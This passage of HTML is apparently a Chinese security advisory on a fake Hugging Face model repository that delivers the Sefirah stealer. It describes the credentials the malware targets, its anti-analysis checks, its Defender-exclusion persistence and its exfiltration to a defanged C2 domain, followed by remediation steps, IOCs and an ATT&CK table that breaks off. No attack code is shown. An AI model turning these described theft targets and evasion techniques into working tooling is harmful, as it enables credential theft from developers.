border-box;"><span textstyle="" style="font-size: 15px;">依赖默认行为：</span></span><span leaf="">受害者按惯例直接执行示例脚本loader.py，攻击链由此打通。</span></p></li></ul><p style="word-break:break-all;white-space:normal;margin:0px;padding:0px;box-sizing:border-box;"><span leaf="">本次攻击充分利用了开源AI生态相较传统软件包生态的两点差异：其一，模型仓库往往包含可执行的预处理/推理脚本，执行边界从“安装”延伸到“加载”；其二，社区对“下载量+点赞数+趋势榜”的依赖远高于代码签名等强校验机制，使得攻击者能够在不投放0day的情况下实现大规模感染。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041909" src="https://wechat2rss.xlab.app/img-proxy/?k=4c0a6397&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxS1M7uCIUgCeiatD4ogHxG42CicKFvSSVriaZh1OrlDUZricfia1ftRMBqicPstV3nSpoJ01YibPZa9IkdV3HODh5bvbotkxK0mia46ciaI%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">多阶段感染链与信息收集目标</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者构建了四阶段感染链：从看似合法的Python脚本起步，逐级隐藏意图，最终落地基于Rust编译的Sefirah窃密木马。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">潜在收集对象包括：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">浏览</span></span><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">器数</span></span><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">据：</span></span><span leaf="">Chromium/Gecko系浏览器的Cookie、保存密码、加密密钥、浏览历史、会话令牌；</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">即时通讯：</span></span><span leaf="">Discord令牌、本地数据库与主密钥；</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">加密资产：</span></span><span leaf="">本地加密货币钱包文件、浏览器扩展中的钱包、钱包种子短语与私钥；</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">远程访问凭据：</span></span><span leaf="">SSH、FTP、VPN凭据及配置文件（含FileZilla）；</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">开发者凭据：</span></span><span leaf="">本地保存的API Key、Access Token、配置文件中的明文密钥；</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">系统信息：</span></span><span leaf="">完整主机信息、安装软件清单、用户名、多显示器全屏截图。</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;text-indent: 0px;"><span leaf="">窃取到的数据经压缩后通过HTTP协议外泄至C2服务器recargapopular[.]com，该域名于2026年2月16日由TUCOWS.COM注册，并通过Cloudflare CDN中转隐藏真实后端。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041910" src="https://wechat2rss.xlab.app/img-proxy/?k=db8c5fe4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxSl09b53w1HlRibvhr4aibyuqwvemb60MRuia9WCvryZy7RKpgT5Np62TRnxlohNqMRActD0CQgxEptmVk1D8KHhUkWEuq9uJ7LbQ%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">持久化能力</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Sefirah载荷集成了多层反分析机制，仅在确认运行环境为真实受害者主机时才会触发完整恶意行为，显著提高了沙箱与自动化分析的成本：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">虚</span></span><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">拟</span></span><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">化环</span></span><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">境检</span></span><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">测：</span></span><span leaf="">识别VMware、VirtualBox、QEMU等虚拟机特征；</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">沙箱检测：</span></span><span leaf="">识别主流自动化分析沙箱的行为特征与硬件指纹；</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">调试器检测：</span></span><span leaf="">检测附加调试器与软件断点；</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">分析工具检测：</span></span><span leaf="">识别Wireshark、Procmon等主机进程。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">持久化方面：</span></span><span leaf="">攻击者并未采用经典的注册表Run键或计划任务，而是通过将最终载荷写入Microsoft Defender排除路径，使Sefirah及其后续行为长期免于本机AV扫描，从而在不显著触发用户感知的情况下保留持续执行能力。</span></p></li></ul></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">解决方案</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041912" src="https://wechat2rss.xlab.app/img-proxy/?k=d08c6e09&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxReosr3zJQQOricfWI6ql17fFC0u3ZDgViaickB33Cq1rTHkc4XUiaBBE5BQr8QAWfgNqI0TCYmibkmLmD28tZnnVzWbXE0BaIzZqMQ%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="text-align: justify;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">建议处置流程</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">针对已下载或执行过Open-OSS/privacy-filter相关代码的开发者及企业用户，建议立即执行如下处置流程：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">1</span></span><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">. 识</span></span><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">别受影响主机：</span></span><span leaf="">在终端与EDR中检索是否曾从Hugging Face拉取过Open-OSS/privacy-filter，或访问过recargapopular[.]com；</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">2. </span></span><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">隔离与重装：</span></span><span leaf="">对疑似受感染主机直接执行重装/重映像，确保loader、PowerShell stager、start.bat与Sefirah主体被彻底清除；</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">3. 凭据全面轮换：</span></span><span leaf="">轮换该主机曾保存的浏览器密码、API Key、SSH私钥、云厂商凭据、Git Token、OpenAI/Anthropic等AI服务Key；</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">4. 会话失效：</span></span><span leaf="">使所有浏览器会话Token与SSO登录态失效，重置双因素认证种子；</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">5. 清理本机Defender排除项：</span></span><span leaf="">检查并删除被start.bat写入的Microsoft Defender排除路径，恢复正常扫描覆盖范围；</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="" style="word-break: break-all;font-style: normal;font-size: 16px;flex-flow: row;justify-content: flex-start;vertical-align: middle;align-self: center;flex: 100 100 0%;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;font-weight: bold;box-sizing: border-box;"><span textstyle="" style="font-size: 15px;">6. 日志与外联审计：</span></span><span leaf="">审查近期出站流量是否存在指向恶意域名；</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041911" src="https://wechat2rss.xlab.app/img-proxy/?k=f56183c3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxTibmkibHtG6ghwjN2Sbol24szvGLShokiaNWdMVcjUb6SrwibOYia8MqbbGO0bN1e9NSDOC2wibKqv59SmJUqbn8xdb9ZejIhCYXg1E%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="text-align: justify;color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">IOC</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">recargapopular[.]com</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">172.67.165.218</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">104.21.66.235</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">MITRE ATT&amp;CK:</span></p><table style="border-collapse:collapse;border:none;mso-border-left-alt:0.5000pt solid windowtext;mso-border-top-alt:0.5000pt solid windowtext;mso-border-right-alt:0.5000pt solid windowtext;mso-border-bottom-alt:0.5000pt solid windowtext;mso-border-insideh:0.5000pt solid windowtext;mso-border-insidev:0.5000pt solid windowtext;mso-padding-alt:0.0000pt 5.4000pt 0.0000pt 5.4000pt;"><tbody><tr style="height:35.7500pt;"><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:1pt;border-style:solid;border-color:#b2b2b2;background:rgb(230, 231, 232);"><p style="text-align:center;"><b><span style=""><font face="Arial"><span leaf="">Tactic</span></font></span></b></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:1pt;border-style:solid;border-color:#b2b2b2;background:rgb(230, 231, 232);"><p style="text-align:center;"><b><span style=""><font face="Arial"><span leaf="">Technique</span></font></span></b></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:1pt;border-style:solid;border-color:#b2b2b2;background:rgb(230, 231, 232);"><p style="text-align:center;"><b><span style=""><font face="Arial"><span leaf="">ID</span></font></span></b></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:1pt;border-style:solid;border-color:#b2b2b2;background:rgb(230, 231, 232);"><p style="text-align:center;"><b><span style=""><font face="Arial"><span leaf="">Application</span></font></span></b></p></td></tr><tr style="height:4.5000pt;"><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Resource Development</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Acquire Infrastructure: Domains</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">T1583.001</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="宋体"><span leaf="">攻击前</span></font><font face="Arial"><span leaf="">3</span></font><font face="宋体"><span leaf="">个月注册</span></font><font face="Arial"><span leaf="">recargapopular.com</span></font><font face="宋体"><span leaf="">，使用</span></font><font face="Arial"><span leaf="">Cloudflare</span></font><font face="宋体"><span leaf="">中转隐藏后端。</span></font></span></p></td></tr><tr><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Initial Access</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Supply Chain Compromise</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">T1195</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="宋体"><span leaf="">在</span></font><font face="Arial"><span leaf="">Hugging Face</span></font><font face="宋体"><span leaf="">投放仿冒</span></font><font face="Arial"><span leaf="">OpenAI Privacy Filter</span></font><font face="宋体"><span leaf="">的恶意仓库。</span></font></span></p></td></tr><tr><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Initial Access</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Phishing</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">T1566</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="宋体"><span leaf="">通过命名仿冒与刷榜实施针对</span></font><font face="Arial"><span leaf="">AI</span></font><font face="宋体"><span leaf="">开发者的社会工程诱导下载。</span></font></span></p></td></tr><tr><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Execution</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span leaf="">Command and Scripting Interpreter: Python</span></font></span></p></td><td data-colwidth="207" width="207" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#b2b2b2;background:rgb(255, 255, 255);"><p style="text-align:center;"><span style=""><font face="Arial"><span 